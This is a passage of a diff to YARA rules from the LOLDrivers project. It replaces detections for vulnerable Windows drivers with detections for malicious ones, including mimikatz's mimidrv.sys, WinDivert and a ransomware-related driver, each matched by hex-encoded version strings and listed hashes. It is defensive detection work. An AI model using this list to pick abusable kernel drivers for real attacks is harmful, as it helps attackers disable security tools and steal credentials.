-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0035002e0031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00620069006f006e0074006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00620069006f006e0074006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200031003900390034002d0032003000320032002000500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400680065002000570069006e00440069007600650072007400200032002e003200200064007200690076006500720020005b00550052004c003a002000680074007400700073003a002f002f0072006500710072007900700074002e006f00720067002f00770069006e006400690076006500720074002e00680074006d006c005d0020005b0042006900740063006f0069006e003a00200031004300350076005a0056005300620069007a00500065005a00380079006400540059006800550066006d0034004c004100320063004e007700420066006300590068005d }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0042006100730069006c }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00570069006e004400690076006500720074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e00440069007600650072007400200032002e00320020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00570069006e004400690076006500720074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200042006100730069006c00200032003000310031002d0032003000320032 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_5148 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_E7AF
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_6.sys"
 		author = "Florian Roth"
-		id = "8685ea34-689e-5b00-8aeb-8f15dd7b3f25"
+		id = "5f883209-6887-5cb4-96bb-988898d47c09"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11722-L11741"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L613-L635"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "51480eebbbfb684149842c3e19a8ffbd3f71183c017e0c4bc6cf06aacf9c0292"
-		logic_hash = "b36414a71e9bd69512ef0c702bf4f7b4bfdb812326a67a0e50f6f75f5c89c152"
-		score = 40
+		hash = "e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e"
+		hash = "b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3"
+		hash = "8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce"
+		hash = "06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4"
+		logic_hash = "b4d12069a9a3a8d8d9bde9a4ed3f80f21f2654b6f96943d201933198678d01d9"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f007700730020004e0054002f0032003000300030002f0058005000200049002f004f0020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0034002c00200033002c00200030002c00200033 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0034002c00200033002c00200030002c00200030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003300200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003100370032 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003100370032 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Biostargroup_Iodriver_Biostariodriver_1D03 : FILE
+rule LOLDRIVERS_MAL_Driver_Chingachgukdengerk_Vusbbussys_Virtualusbbusdriver_B4F3
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BS_HWMIO64_W10.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_b4f33ffe.sys"
 		author = "Florian Roth"
-		id = "ea157129-3347-5ba0-a115-928b4aef345f"
+		id = "68298157-58f2-51de-b534-f86bdefe00a6"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11744-L11763"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L638-L657"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8"
-		logic_hash = "26e886b28b40a920558a652197a0d7a31fc5f7b239d3886fdf0f44da4590dabb"
-		score = 40
+		hash = "b4f33ffef069c18e8a8834eb448dd1f1dbdaae93b140cfff5a1db015eb3ada2f"
+		logic_hash = "00c68cc29903f0a92d8ff711ab539c97033ba03efa5f895005da925db897bdd8"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049002f004f00200049006e00740065007200660061006300650020006400720069007600650072002000660069006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00420049004f0053005400410052002000470072006f00750070 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002c00200030002c00200031003800300036002c00200032003200300030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002c00200030002c00200031003800300036002c00200032003200300030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0049002f004f0020006400720069007600650072 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00420049004f005300540041005200200049002f004f0020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00420053005f00480057004d0049004f00360034005f005700310030002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280063002900200032003000310038002d0032003000310039002000420049004f0053005400410052002000470072006f00750070 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c002000550053004200200062007500730020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004300680069006e006700610063006800670075006b00200026002000440065006e0067006500720032006b }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e00310020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0076007500730062006200750073002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005600690072007400750061006c002000550053004200200062007500730020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0076007500730062006200750073002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900320030003000340020004200790020004300680069006e006700610063006800670075006b00200026002000440065006e0067006500720032006b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avgtechnologiesczsro_Aswarpotsys_Avginternetsecuritysystem_E2E7 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_30E0
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "ec02c434-7918-5212-85f6-5ee417940b7c"
+		id = "888de0dc-5643-5e55-8272-9363cc55bfcf"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11766-L11785"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L660-L680"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "e2e79f1e696f27fa70d72f97e448081b1fa14d59cbb89bb4a40428534dd5c6f6"
-		logic_hash = "9f77c427b54f1a940547cfc206b8d1aed0288d0664a5a124785c7fcec7b90507"
-		score = 40
+		hash = "30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2"
+		hash = "a906251667a103a484a6888dca3e9c8c81f513b8f037b98dfc11440802b0d640"
+		logic_hash = "e2c964f7e30da210778e8a2e5bb96d53485a0736cf3ff28bccbefacb6b46765a"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410056004700200061006e0074006900200072006f006f0074006b00690074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310039002e0034002e0034003200310031002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310039002e0034002e0034003200310031002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410056004700200049006e007400650072006e00650074002000530065006300750072006900740079002000530079007300740065006d0020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310039002000410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310033002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_B224 : FILE
+rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_090D
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - DcProtect.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_090d409f.sys"
 		author = "Florian Roth"
-		id = "d5d84ed9-f0c5-54a8-8a7d-0006c1c98f1d"
+		id = "5c1070f6-a282-5cee-b9bc-ea833b766e1f"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11788-L11807"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L683-L703"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "b2247e68386c1bdfd48687105c3728ebbad672daffa91b57845b4e49693ffd71"
-		logic_hash = "e1d35eb3ea6012cf8b742e97f08d797b4fd64bcc72bd7ebccb8ca33f11afad67"
-		score = 40
+		hash = "090d409f86430e078694e621ad0bd5e458d32aa727f0eb99bda3961577df8d49"
+		hash = "04e1f364c0fcebaa1f0833c0595a976d0625ed3390441b4f2d1aedb314bf2497"
+		logic_hash = "079ccac2c3427b198a0873ee69ab4ce8631a4b35fa3829468883a0acf2852b94"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0044006300500072006f00740065006300740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e0031003000780036003400200064007200690076006500720020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032002d00320030003200300020004a00690061006e0067006d0065006e0020004500790075006e0020004e006500740077006f0072006b00200043006f002e002c004c00740064002e00200032003000310039 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e003800300037 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Intelcorporation_Iqvwsys_Intelriqvwsys_5F69 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_6908
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - iQVW64.SYS"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_2.sys"
 		author = "Florian Roth"
-		id = "04fdd9f7-605b-54ee-849d-44a50ef732d2"
+		id = "3bd8b888-8170-5da6-ba1c-f13c1ca27e6f"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11810-L11829"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L706-L725"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683"
-		logic_hash = "0242a0398f90468dfc41eb04570a70d5072fe089b270feb1f5ab7fbd2c7a1ffc"
-		score = 40
+		hash = "6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f"
+		logic_hash = "9cde0a399b852038979993375be2a6d0f9f9f760381e94df0190256e8810949f"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e00740065006c0028005200290020004e006500740077006f0072006b0020004100640061007000740065007200200044006900610067006e006f00730074006900630020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0049006e00740065006c00200043006f00720070006f0072006100740069006f006e0020 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e00300033002e0032002e00370020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00300033002e0032002e0037 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006900510056005700360034002e005300590053 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e00740065006c0028005200290020006900510056005700360034002e005300590053 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006900510056005700360034002e005300590053 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300032002d003200300031003600200049006e00740065006c00200043006f00720070006f0072006100740069006f006e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e003900330038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e003900330038 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Ngiodriversys_Avastng_5E3B : FILE
+rule LOLDRIVERS_MAL_Driver_Tonecinc_Idmtdisys_Internetdownloadmanager_2C1B
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ngiodriver.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
 		author = "Florian Roth"
-		id = "f454f9bf-3dd3-5bb1-a5b5-c00f5356bd25"
+		id = "f09f5edb-c807-599a-8caa-7d892f315462"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11832-L11851"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L728-L749"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "5e3bc2d7bc56971457d642458563435c7e5c9c3c7c079ef5abeb6a61fb4d52ea"
-		logic_hash = "893fe9de3a164fd33483d139e76db4c213c402f276bd285c9acefd76da1d2f38"
-		score = 40
+		hash = "2c1b65c2988b337182f1ba57b404793454e30a7fd328d34bc2e79857dc437a4a"
+		hash = "44ebb0f534e7cdfec06d5234358d219798a313219b214d72aa23afc5a57d7ea9"
+		hash = "77225a99b2e0e2b4007fb2f5a96d356e13deab45b9ef54c175d5452de8a211a7"
+		logic_hash = "e15700f9f1431b8d9c5682726839c2e30c66394c90e572f22e061cec44f99710"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0061007600610073007400210020004e0047002000730065007400750070002000680065006c0070006500720020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e0030002e00330033 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e0030002e00330033 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e00670069006f006400720069007600650072002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004100760061007300740020004e0047 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e00670069006f006400720069007600650072002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003400200041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e007400650072006e0065007400200044006f0077006e006c006f006100640020004d0061006e006100670065007200200054004400490020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054006f006e0065006300200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00330032002e0033002e00380030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00330032002e0033002e0031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00690064006d007400640069002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e007400650072006e0065007400200044006f0077006e006c006f006100640020004d0061006e0061006700650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00690064006d007400640069002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a9002000310039003900390020002d0020003200300031003800200054006f006e0065006300200049006e0063002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_9DEE : FILE
+rule LOLDRIVERS_MAL_Driver_Dwadsafeloadsys_E112
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - DcProtect.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_e1123b59.sys"
 		author = "Florian Roth"
-		id = "38c59d28-a35d-57f5-ad0e-7822e3381b53"
+		id = "ca8a37aa-8bb6-5cf6-ae3a-4747611571a0"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11854-L11873"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L752-L771"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "9dee9c925f7ea84f56d4a2ad4cf9a88c4dac27380887bf9ac73e7c8108066504"
-		logic_hash = "e7f65896009629498b16fdacd7dcdaafae8336365e621f791e880c108bbab75b"
-		score = 40
+		hash = "e1123b59a801e243a64270d0c6ab1277e5e3afba9c19023807409f53c1b0204b"
+		logic_hash = "478f361102f57948fedbc00b49f0874b915b2fc65bb4be900593da8ad4fe24d3"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0044006300500072006f00740065006300740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e0038002e003100780036003400200064007200690076006500720020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032002d00320030003200300020004a00690061006e0067006d0065006e0020004500790075006e0020004e006500740077006f0072006b00200043006f002e002c004c00740064002e00200032003000310039 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]5ba262377aef52a08f7d9a7152a8 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]6e56531776fe7f517f517edc79d1628067099650516c53f8 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032003000320032002e0031002e00310036002e0031003000300030 }
